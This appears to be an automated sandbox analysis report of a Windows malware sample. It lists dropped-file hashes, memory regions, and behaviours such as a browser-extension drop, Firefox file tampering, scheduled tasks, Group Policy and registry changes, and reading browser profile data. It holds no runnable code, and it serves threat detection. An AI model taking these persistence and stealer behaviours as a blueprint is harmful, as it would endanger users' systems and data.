SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 e648803b818a94993a9b7b9d71cc3fd8
SHA1 4da1ed3e5f6db90f87ec351728b6cce904baf5f0
SHA256 370ebf48ee6f11de009f8d7681a6954856bc8cd8d0f4d4d8415215eda2335b84
SHA512 d7da67de2b93fba4988c5ee043603a9fc82930b18fdfb89e4942fd092ddc0eb33f96eb0497db5f3e1909b2bb3cf7e8d6402e185a0f3293df0cdf2501fad9ba58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\orRvbnhdU\CAwHQVp.xml

MD5 c33a96442f33f8056c24babad3a46be0
SHA1 836eb47b58dc043da4ca25e10459cbf7075d036f
SHA256 67bc71799db34e350f36d5f2f7cb1b6e0cfa8f4944be06d235b8e8e727aace29
SHA512 45b954fb7b09bc93f931761c8207898e246aabf56d55f990ec597e11a6e3e67bfabf2c320210265543710b6924a093a46a986c4fdce1009b2b572801d4967032

C:\Program Files (x86)\YrliKKkuhgWU2\Sxxhlmi.xml

MD5 fa02538d9d5d0fd7cd6be169d62bf393
SHA1 247aaf02705342c7dfc528a8a8ea83a0ecb1e8f4
SHA256 654bfaffac9b0c0179a5c8b0a9251c453b4245e3df595acf5f0f9d006515ea53
SHA512 0c58fc6831a434e3139626ef98f7ec014aa793764525be8935f58c8ba43aeb8ecdabc45ce84a56cf8de568f3665d524c788350686edee1ef1da27442c42ada0f

C:\ProgramData\qgjSpVnHOWlNdqVB\ZAcQvcK.xml

MD5 107c858b38dd6a7407c0cd324075a004
SHA1 7e24fbf4a30e0955a6e87ae586eb6adf9d969df3
SHA256 91011a7d35c782224dc3634c2e0d092f17da5a75b0994945f93acf30f3d797b9
SHA512 5d3837fd9f42115dec6e4cb7560e9aeea6f5078c278d63e0ad57a1246178c85f89f34997ec93c36404ab8358cf11335d4cbcb884400edfdf42957898c44e4927

C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\yMucUOn.xml

MD5 91f07db1f80527ca50b42d36e522568c
SHA1 fea67b4894635da0fccbdf655a3691ff075c7527
SHA256 a89d0a4adf80f7a7f31550d35464394444dd41263f1acce1f34030bab0c336f7
SHA512 21c9ec6b8c9768b3c313bc6f5508b9fb6e5d3b9516be7c81914cd446ea2fa15716e96ca2d191e4d7426a316e6c85669f6bff51c52c50d26dd0954b3f302b3f88

C:\Program Files (x86)\ycfBUKIjHxeOC\AUIHvKh.xml

MD5 07bea4d63771d8b6b42c702035a404bb
SHA1 cbd93a563b85b953feef8fe6fd633014a4ed252b
SHA256 2dbdd6349dc908a36a9258817fc203111e553c6744887bda0485cb6e98bae3bf
SHA512 eed37fd8515006b7ed37d3c679b0b16e191283aa5a9335dc71aca512e669b7c69d2c152586838742929c1eb54b86ab486f54bfc5137e526865c2d14e96246126

C:\Windows\Temp\lwSRcZKonRlOofsg\EoGhlcSG\dZbEfvp.dll

MD5 db0e0228f220bd8fa3b45a0043744456
SHA1 e287442ab5c21cab796c6893a34f0474820b6515
SHA256 9d17deafa6484b95a25345472c61bfbf7c510b4fafd2a52e7806db27ec4a6883
SHA512 a6d1aa8dc12f47ca1b9781264f02a4058287eb3bca0033ec9c3d3bd4adc9e3ac87c6bfcb361dc90ea40c056e0a9f29a28c7454afef5233a11c13c5c40d35f763

memory/5028-501-0x00000000036A0000-0x0000000003723000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3e5zl51i.default-release\prefs.js

MD5 7a0fbcaea895a47e356d2a0590590104
SHA1 2aea0b8c9848c06f33298ff2d2582cd01a1809c5
SHA256 77124e1271af668240f1f81b1c001cb4fa685064a2c1c7f1e0cbbf8c5cb96330
SHA512 aec9cbac3ddf88971c8fe573db46e3867ca64a056b053bc0f6cf8da30876e8281868ba5f9e24255e14669a572c52b04d9a600b578721ef354e9b0b7621bfd2f2

memory/5028-515-0x0000000003730000-0x00000000037FF000-memory.dmp

memory/3728-519-0x0000000001DD0000-0x00000000023A3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c17ee0fa7295d0c43979dc739f7ca123
SHA1 278bd0ba8f9e5969e57942ca26648e6d999e8109
SHA256 f5c479f6c4d355e10850f5344b0f4acd0d0f3640b4c97075e72ac424c31d88ed
SHA512 fe53ffb47ba20eeeac45647f21b9d21e27dc86f92d075fc5fecbf88dd4db22ed44dd6711f7a604684f33b9ac4db08e0f05bc20813330621e9c7b5da91003697a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 709a046ea96dea3c5904f2089ceb250e
SHA1 80a3780fe21c14a0528d42f9aba8e401bee5d11b
SHA256 f1775a5e7ce2f1bd514cca1f71f7a582e00e5e959afd85d2db23e2ea527b328e
SHA512 dea3ef9ee44333db8d712752bcf96e52b000640f39d0e51373458c2a51d9229adf611d9aa9c3aeab17f2d3eec436e009560aa8a1c382da0fd93b7f52b19fda59

memory/4872-575-0x00000000005C0000-0x0000000000C7E000-memory.dmp

memory/5028-580-0x0000000000140000-0x00000000007FE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-07 18:00

Reported

2024-04-07 18:03

Platform

win11-20240221-en

Max time kernel

149s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\rTNzAXAyLsxBA.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\TzXysB.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\yLnJFfw.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\LNzqiDk.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\YtfDfRG.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d0a0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8b01524b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
